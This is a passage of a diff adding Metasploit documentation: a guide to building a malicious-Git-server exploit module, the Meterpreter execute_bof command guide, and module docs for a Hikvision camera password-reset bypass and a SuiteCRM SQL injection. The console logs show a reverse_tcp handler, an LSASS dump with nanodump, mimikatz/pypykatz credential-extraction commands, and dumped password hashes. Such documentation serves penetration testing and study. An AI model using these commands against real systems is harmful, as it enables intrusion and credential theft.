+  "x\x9C\x95\xCEA\x0E\xC2 \x10\x05P\xD7\x9Cb<@\r\x1DZ\xCA\xC2\x18\xE3\xCE\xA8g0XF!\xB6\xD0\x00]x{I\xED\x05\\\xCD\xE4'\xF3\xFE\xF4a\x1C]\x06\x14j\x93#\x11pe\b\el5u]cL#\xD1\x18\xC9\x05\x97\x92\x04*\xF3h\xA5P}\xC7\x89\xE99\xDB\x10\xE1\xEA\x92\xF6&j\xB8\xCC\x93\xD5\x03\xEC\xDF\xCB\xBC\x0Fk~\xB43\ri\xE7)\x1F\xA0\xAEU[\x10l\x05T\x85\xE4\xAC_\xCA3\xFD\xC7\xA8\x0E%\nQ\xE3\xAA\xB0\xB3w\xD9\x95\xA3\x1F\a9@\x98\xC8\xC3\xAB\xEC\x91\xA6\x90\\\x0E\xF1\x03\xCF\xF2\xED\xC9\xF9T\xDD\x82\x8D[\xF6\x05s\xF7P\x89",                                                                       
+ @content=                                                                                     
+  "tree 08de2425ae774dd462dd603066e328db5638c70e\nauthor Lisandra Kuphal <kuphal_lisandra@huels.net> 1185328253 -0300\ncommitter Lisandra Kuphal <kuphal_lisandra@huels.net> 872623312 -0300\n\nInitial commit to open git repository for Bins-Mohr!\n",
+ @path="01/8856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @sha1="018856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @type="commit">
+```
+
+That's all that is needed to create a valid repository in Metasploit.
+
+### Hosting the Repository
+
+Metasploit's current implementation of the Git protocol works over HTTP ([SmartHttp docs][3]),
+so to host a malicious repository with Metasploit, the exploit module needs to
+leverage the `Msf::Exploit::Remote::HttpServer` mixin. Additionally,
+the [Git][1] and [Git SmartHttp][2] mixins need to be included to build objects
+and create appropriate responses for the client's requests.
+
+The module should look similar to other exploit modules that use the HttpServer mixin,
+defining an `on_request_uri()` method, a `primer()` method, and an `exploit()` method.
+The `primer()` method is first to execute, so setup for things like the repository uri
+can happen there:
+
+```ruby
+  # Creates a random uri for the Git repo, ensuring that there are no spaces
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  # Uses GIT_URI datastore option or randomly generates a repo URI
+  # Registers the URI with the http server and prints the entire path that client should pass to git clone
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+```
+
+Next, the `exploit()` method can be used to set up the repository.
+The code used in the `Building a Repository` section can be placed here
+before entering the listen / accept loop.
+
+The `on_request_uri()` method is where most of the module logic will live.
+No matter what the client sends, the request should first be parsed
+by `Msf::Exploit::Git::SmartHttp::Request.parse_raw_request()`.
+The `parse_raw_request()` method will format the request so it is easier to work with.
+The first request that a client will send when cloning a repository is a reference
+discovery request. The client will expect things like server capabilities and the
+reference that `HEAD` points to in the response. Since this is a simple repo only one
+branch will exist, so `HEAD` will point to `refs/heads/master` and `refs/heads/master`
+will point to the latest commit in the repo, which in this case is the only commit
+in the repo. This can be represented as the following hash:
+
+```ruby
+refs =
+{
+	'HEAD' => 'refs/heads/master',
+	'refs/heads/master' => commit_object.sha1
+}
+```
+
+Creating a proper response to a `ref-discovery` request is done through
+`Msf::Exploit::Git::SmartHttp.get_ref_discovery_response()`. It takes two parameters:
+The request object from `parse_raw_request()` and the above `refs` hash.
+After the response is built, it can be sent back to the client.:
+
+```ruby
+response = get_ref_discovery_response(request, @refs)
+cli.send_response(response)
+```
+
+If the client successfully receives the `ref-discovery` response,
+it will then send an `upload-pack` request. The `upload-pack` request is a `POST`
+request containing the client's capabilities and a 'want' list for objects in
+the repository. To create a proper response, the `Msf::Exploit::Git::SmartHttp.get_upload_pack_response()`
+method should be used. Again, this method accepts two arguments. The first is the
+parsed request from the client, and the second is an array of all objects that exist
+in the repo. The `get_upload_pack_response()` method will check the sha1 hash of
+each object against the hashes in the want list that the client sent and send only
+the requested object hashes.
+
+```ruby
+response = get_upload_pack_response(request, @git_objs)
+cli.send_response(response)
+```
+
+Upon receiving the `upload-pack` response from the server,
+the client will build out the repository.
+
+Putting it all together, the module should look something like the following:
+
+```ruby
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Git
+  include Msf::Exploit::Git::SmartHttp
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Git Clone Test',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ ],
+        'References' => [ ],
+        'DisclosureDate' => '2022-09-22',
+        'Platform' => [ 'unix' ],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {}
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
+      ]
+    )
+
+    deregister_options('RHOSTS', 'RPORT')
+  end
+
+  def exploit
+    setup_repo_structure
+    super
+  end
+
+  def setup_repo_structure
+    # create blob object for contents of 'test_file.txt'
+    contents = "test\n"
+    blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing 'test_file.txt' in 'dir' folder
+    tree_entry =
+    {
+      mode: '100644',
+      file_name: 'test_file.txt',
+      sha1: blob.sha1
+    }
+    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+
+    # create blob object for contents of 'file.txt'
+    contents = "some text\n"
+    file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing top-level directory of repo
+    entries =
+    [
+      {
+        mode: '100644',
+        file_name: 'file.txt',
+        sha1: file_blob.sha1
+      },
+      {
+        mode: '040000',
+        file_name: 'dir',
+        sha1: tree_object.sha1
+      }
+    ]
+    top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+
+    # create commit
+    commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sha1)
+
+    # create list of objects in repository, as the
+    # client will request them to build the repository
+    @git_objs =
+      [
+        commit_object, top_level_obj, tree_object,
+        file_blob, tree_object, blob
+      ]
+
+    @refs =
+      {
+        'HEAD' => 'refs/heads/master',
+        'refs/heads/master' => commit_object.sha1
+      }
+  end
+
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+
+  def on_request_uri(cli, req)
+    request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
+    case request.type
+    when 'ref-discovery'
+      response = get_ref_discovery_response(request, @refs)
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid ref-discovery request') unless response
+    when 'upload-pack'
+      response = get_upload_pack_response(request, @git_objs)
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid upload-pack request') unless response
+    else
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
+    end
+
+    cli.send_response(response)
+  end
+end
+```
+
+### Running the module
+
+The module will start the http server and print the repo to clone
+
+```
+msf6 > use exploit/multi/http/git_clone_test
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/git_clone_test) > set srvport 9999
+srvport => 9999
+msf6 exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
+srvhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+msf6 exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Using URL: http://192.168.140.1:9999/MOYuJfC
+[*] Server started.
+[*] Git repository to clone: http://192.168.140.1:9999/y-find.git
+```
+
+Once the repository is cloned, you should expect to see the same contents as the `test-repo` at the beginning of this document:
+
+```
+space@ubuntu:~$ git clone http://192.168.140.1:9999/y-find.git
+Cloning into 'y-find'...
+remote: Enumerating objects: 6, done.
+remote: Counting objects: 100% (6/6), done.
+remote: Compressing objects: 100% (6/6), done.
+remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
+Unpacking objects: 100% (6/6), 401 bytes | 200.00 KiB/s, done.
+space@ubuntu:~$ cd y-find
+space@ubuntu:~/y-find$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 22 12:05 .
+drwxr-x--- 22 space space 4096 Sep 22 12:05 ..
+drwxrwxr-x  2 space space 4096 Sep 22 12:05 dir
+-rw-rw-r--  1 space space   10 Sep 22 12:05 file.txt
+drwxrwxr-x  8 space space 4096 Sep 22 12:05 .git
+space@ubuntu:~/y-find$ cat dir/test_file.txt 
+test
+space@ubuntu:~/y-find$ cat file.txt
+some text
+```
+
+[1]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git/smart_http.rb
+[3]: https://git-scm.com/docs/http-protocol
@@ -0,0 +1,154 @@
+This guide outlines how to use the Meterpreter `execute_bof` command as provided by the `bofloader` extension. It allows
+a Meterpreter session to execute "Beacon Object Files" or BOF files for short. A BOF is a
+[Common Object File Format][1] (COFF) executable file with an API of standard functions defined in [beacon.h][2].
+
+The `bofloader` extension is only available for the Windows native Meterpreter, i.e. it is unavailable in the Java
+Meterpreter even when running on the Windows platform.
+
+# Execution Environment
+**Warning:** The execution environment is shared with the Meterpreter process. If there is an exception or the BOF
+crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
+session to avoid losing access altogether.
+
+The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
+the same limitations.
+
+The following functions are unavailable:
+
+* `BeaconDataPtr`
+* `BeaconUseToken`<sup>1</sup>
+* `BeaconRevertToken`<sup>1</sup>
+* `BeaconIsAdmin`
+* `BeaconInjectProcess`
+* `BeaconInjectTemporaryProcess`
+
+<sup>1</sup> The token functions are defined and present, but will only effect the execution of the BOF and not the
+Meterpreter runtime environment.
+
+Currently, there is only one output stream. All output data processed by `BeaconOutput` and `BeaconPrintf` is combined
+into that stream. BOFs should not use this for outputting binary data.
+
+# Usage
+The `bofloader` extension provides exactly one command, through which all of the provided functionality is accessed.
+
+`execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`
+
+
+
+* `-c` / `--compile` -- Compile the input file (requires mingw).
+* `-e` / `--entry` -- The entry point (default: `go`).
+* `-f` / `--format-string` -- Argument format-string. See details below.
+
+## Compile
+The compile option will use a local mingw instance to compile the input file into a COFF file for execution. The
+standard [beacon.h][2] file will be in the include path automatically. In this case, the input file is treated as a C
+source file instead of compiled data.
+
+## Entry Point
+Once loaded the loader will call the BOF entry point. By default, this value is `go`. The entry point option can change
+it to another valid function to call instead.
+
+## Argument Format-String
+The `execute_bof` command is capable of serializing arguments to be sent to the BOF for execution. The user must define
+the data type of each argument that the BOF file expecting to see. This information would come from either reading the
+BOF's documentation or source code. **Incorrectly specifying the arguments or omitting them entirely can result in the
+BOF crashing and the Meterpreter session dying.**
+
+BOF argument types are defined in the format string argument with `-f` / `--format-string`.
+
+The following table describes each of the types.
+
+| Type    | Description                                                     | Unpack With (C)               |
+| --------|-----------------------------------------------------------------|-------------------------------|
+| b       | binary data (e.g. 01020304, file:/path/to/file.bin)<sup>1</sup> | BeaconDataExtract             |
+| i       | 32-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataInt                 |
+| s       | 16-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataShort               |
+| z       | null-terminated utf-8 string                                    | BeaconDataExtract             |
+| Z       | null-terminated utf-16 string                                   | (wchar_t *)BeaconDataExtract  |
+
+<sup>1</sup> Binary data arguments are specified as either a stream of hex characters or as the path to a file local to
+the Metasploit Framework instance. In the case of a file path, it must be prefixed with `file:`.
+
+<sup>2</sup> Integer arguments are specified as either decimal or hexadecimal literals.
+
+Unknown arguments are treated as BOF arguments. Additionally, any arguments after the `--` terminator are explicitly
+treated as BOF arguments. Using the terminator allows ambiguous arguments to such as `--help` to be forward to the BOF
+instead of being processed locally. The number of BOF arguments to be forward must equal number of characters in the
+argument format string.
+
+# Usage Examples
+Executing [dir][4], passing the path argument and number of sub-directories to list.
+
+```
+meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
+Contents of C:\*:
+	08/05/2022 15:17           <dir> $Recycle.Bin
+	08/05/2022 15:16      <junction> Documents and Settings
+	09/22/2022 08:35      1342177280 pagefile.sys
+	08/05/2022 16:48           <dir> PerfLogs
+	09/08/2022 12:51           <dir> Program Files
+	09/15/2018 05:06           <dir> Program Files (x86)
+	08/05/2022 15:26           <dir> ProgramData
+	09/07/2022 10:24           <dir> Python27
+	08/05/2022 15:16           <dir> Recovery
+	08/05/2022 15:40           <dir> System Volume Information
+	08/05/2022 15:16           <dir> Users
+	09/01/2022 13:49           <dir> Windows
+	                      1342177280 Total File Size for 1 File(s)
+	                                                     11 Dir(s)
+
+meterpreter > 
+```
+
+Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
+written to disk. Once completed, the dump file can be downloaded from the remote host.
+
+```
+meterpreter > ps lsass
+Filtering on 'lsass'
+
+Process List
+============
+
+ PID  PPID  Name       Arch  Session  User                 Path
+ ---  ----  ----       ----  -------  ----                 ----
+ 712  556   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
+
+meterpreter > execute_bof nanodump.x64.o --format-string iziiiiiiiiziiiz 712 nanodump.dmp 1 1 0 0 0 0 0 0 "" 0 0 0 ""
+Done, to download the dump run:
+download nanodump.dmp
+to get the secretz run:
+python3 -m pypykatz lsa minidump nanodump.dmp
+mimikatz.exe "sekurlsa::minidump nanodump.dmp" "sekurlsa::logonPasswords full" exit
+meterpreter > download nanodump.dmp 
+[*] Downloading: nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 1.00 MiB of 11.56 MiB (8.65%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 2.00 MiB of 11.56 MiB (17.31%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 3.00 MiB of 11.56 MiB (25.96%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 4.00 MiB of 11.56 MiB (34.62%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 5.00 MiB of 11.56 MiB (43.27%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 6.00 MiB of 11.56 MiB (51.92%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 7.00 MiB of 11.56 MiB (60.58%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 8.00 MiB of 11.56 MiB (69.23%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 9.00 MiB of 11.56 MiB (77.89%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 10.00 MiB of 11.56 MiB (86.54%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.00 MiB of 11.56 MiB (95.2%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.56 MiB of 11.56 MiB (100.0%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] download   : nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+meterpreter > 
+```
+
+# References
+
+* [hstechdocs.helpsystems.com/manuals/cobaltstrike][6] for Cobalt Strike's BOF documentation
+* [beacon.h][2] source code for the BOF API
+* [TrustedSec/COFFLoader][3] for the source code of the loader
+* [trustedsec/CS-Situational-Awareness-BOFF][7] for a collection of useful BOFs
+
+[1]: https://en.wikipedia.org/wiki/COFF
+[2]: https://github.com/Cobalt-Strike/bof_template/blob/4a5009fc4adeb35bb1b1887da478280f12f9693a/beacon.h
+[3]: https://github.com/TrustedSec/COFFLoader
+[4]: https://github.com/trustedsec/CS-Situational-Awareness-BOF/tree/master/src/SA/dir
+[5]: https://github.com/helpsystems/nanodump
+[6]: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm
+[7]: https://github.com/trustedsec/CS-Situational-Awareness-BOF
@@ -211,6 +211,10 @@ NAVIGATION_CONFIG = [
                path: 'Meterpreter-Debugging-Meterpreter-Sessions.md',
                title: without_prefix('Meterpreter ')
              },
+              {
+                path: 'Meterpreter-ExecuteBof-Command.md',
+                title: without_prefix('Meterpreter ')
+              },
              {
                path: 'How-to-get-started-with-writing-a-Meterpreter-script.md'
              },
@@ -438,6 +442,10 @@ NAVIGATION_CONFIG = [
                path: 'How-to-use-PhpEXE-to-exploit-an-arbitrary-file-upload-bug.md',
                title: 'PhpExe'
              },
+              {
+                path: 'How-to-use-the-Git-mixin-to-write-an-exploit-module.md',
+                title: 'Git Mixin'
+              },
              {
                title: 'HTTP',
                folder: 'http',
@@ -0,0 +1,116 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras contain improper authentication logic that allow unauthenticated impersonation of any
+configured user account. This allows an attacker to bypass all security on the camera and
+gain full admin access, allowing them to thereby completely control the camera and modify
+any setting or retrieve sensitive information.
+
+This module allows the attacker to perform an unauthenticated password change on
+any vulnerable Hikvision IP Camera by utilizing the improper authentication logic to
+send a request  to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `username` parameter and will instead use the username
+part of this string as the user to log in as. This can then be used to gain full 
+administrative access to the affected device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled
+camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set USERNAME <name of user>`
+1. `set PASSWORD <new password>`
+1. `check`
+1. `set ID <id of user whose password you want to reset from "check" output>`
+1. `run`
+1. You should get a message that the password for the user has been successfully changed.
+
+## Options
+### STORE_CRED
+This option allows you to store the user and password credentials in the Metasploit database for further use.
+
+## Scenarios
+
+### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
+
+```
+msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
+RHOSTS => 192.168.100.180
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
+PASSWORD => Pa$$W0rd
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
+ID => 1
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
+STORE_CRED => true
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
+
+Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   ID          1                yes       ID (default 1 for admin)
+   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
+                                          t
+   RPORT       80               yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED  true             no        Store credential into the database.
+   USERNAME    admin            yes       Username for password change
+   VHOST                        no        HTTP server virtual host
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[*] Starting the password reset for admin...
+[+] Password reset for admin was successfully completed!
+[*] Please log in with your new password: Pa$$W0rd
+[*] Credentials for admin were added to the database...
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
+```
@@ -0,0 +1,195 @@
+## Description
+This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The 
+vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password 
+hashes from the SuiteCRM database.
+
+## Vulnerable Application
+
+The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM.
+There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users,
+browse to `/index.php?module=Users&action=index` and then click the `Create New User` button on the left side
+of the screen. Then enter a username and a last name. Then click the `password` tab, and enter a password for
+the user, then confirm this password and click the `Save` button to create the user.
+
+### Docker compose
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+To create a SuiteCRM 7.12.5 Docker container, first create a new folder, 
+then save the following content as `docker-compose.yml`:
+
+```
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_suitecrm
+      - MARIADB_DATABASE=bitnami_suitecrm
+      - MARIADB_PASSWORD=bitnami123
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.12.5
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - SUITECRM_DATABASE_HOST=mariadb
+      - SUITECRM_DATABASE_PORT_NUMBER=3306
+      - SUITECRM_DATABASE_USER=bn_suitecrm
+      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
+      - SUITECRM_DATABASE_PASSWORD=bitnami123
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'suitecrm_data:/bitnami/suitecrm'
+    depends_on:
+      - mariadb
+volumes:
+  mariadb_data:
+    driver: local
+  suitecrm_data:
+    driver: local 
+```
+
+Finally, in the same directory as the `docker-compose.yml` file, run: `docker-compose up -d`.
+
+Note that the default username to log in will be `user` and the password will be `bitnami`. If you
+want to change these, put the following lines under the `environment` section:
+
+```
+    environment:
+      - SUITECRM_USERNAME=my_user
+      - SUITECRM_PASSWORD=my_password
+```
+
+The above would set the username to `my_user` and the password to `my_password`.
+
+For more information on the docker compose file, refer to
+https://github.com/bitnami/containers/tree/main/bitnami/suitecrm.
+
+### Install from source
+
+Source code can be found here: [SuiteCRM v7.12.5](https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz) 
+
+Instructions on installing from source can be found here: [Installation Guide](https://docs.suitecrm.com/admin/installation-guide/downloading-installing/) 
+
+The following setup was installed on Ubuntu 20.04:
+
+1. Setup and install MySQL:
+    1. `sudo apt update`
+    1. `sudo apt install mysql-server`
+    1. `sudo systemctl start mysql.service`
+    1. `sudo mysql` (open the mysql prompt)
+    1. `mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';` (change the password 
+       of the root user)
+       
+1. Install Apache
+    1. `sudo apt install apache2`
+    1. `sudo systemctl enable apache2`
+    1. `sudo systemctl start apache2`
+       
+1. Install php and its dependencies
+    1. `sudo apt -y install php7.4`
+    1. `sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip`
+    1. `sudo apt install composer`
+    1. `composer install`
+    
+1. Setup and install SuiteCRM 7.12.5
+    1. `wget https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz`
+    1. `gunzip v7.12.5.tar.gz`
+    1. `tar -xvf v7.12.5.tar`
+    1. `sudo cp -r SuiteCRM-7.12.5/. /var/www/html`
+    1. `cd /var/www/html`
+    1. `sudo chown -R www-data:www-data .`
+    1. `sudo chmod -R 755 .`
+    1. `sudo chmod -R 775 custom modules themes data upload`
+    1. `sudo chmod 775 config_override.php 2>/dev/null`
+    1. Navigate to http://localhost/install.php and follow the installation wizard to complete the install
+    
+
+## Verification Steps
+
+1. Start up metasploit
+1. Do: `use auxiliary/gather/suite_crm_export_sqli`
+1. Do: `set RHOSTS [IP]`
+1. Configure a user and password by setting `USERNAME` and `PASSWORD`.
+1. Do: `run`
+
+## Scenarios
+
+### SuiteCRM 7.12.5 Bitnami Docker Image
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli 
+msf6 auxiliary(gather/suite_crm_export_sqli) > show options
+
+Module options (auxiliary/gather/suite_crm_export_sqli):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   COUNT     3                no        Number of users to enumerate
+   PASSWORD                   yes       Password for user
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                        loit
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       Username of user
+   VHOST                      no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name              Description
+   ----              -----------
+   Dump credentials  Dumps usernames and passwords from the users table
+
+
+msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
+USERNAME => user
+msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
+PASSWORD => bitnami
+msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/suite_crm_export_sqli) > check
+
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] 127.0.0.1:80 - The target is vulnerable.
+msf6 auxiliary(gather/suite_crm_export_sqli) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] The target is vulnerable.
+[*] Fetching Users, please wait...
+SuiteCRM User Names
+===================
+
+ Username
+ --------
+ testuser
+ user
+
+[*] Fetching Hashes, please wait...
+[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+SuiteCRM User Credentials
+=========================
+
+ Username  Hash
+ --------  ----
+ testuser  $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+ user      $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/suite_crm_export_sqli) > 
+```
@@ -0,0 +1,212 @@
+## Vulnerable Application
+
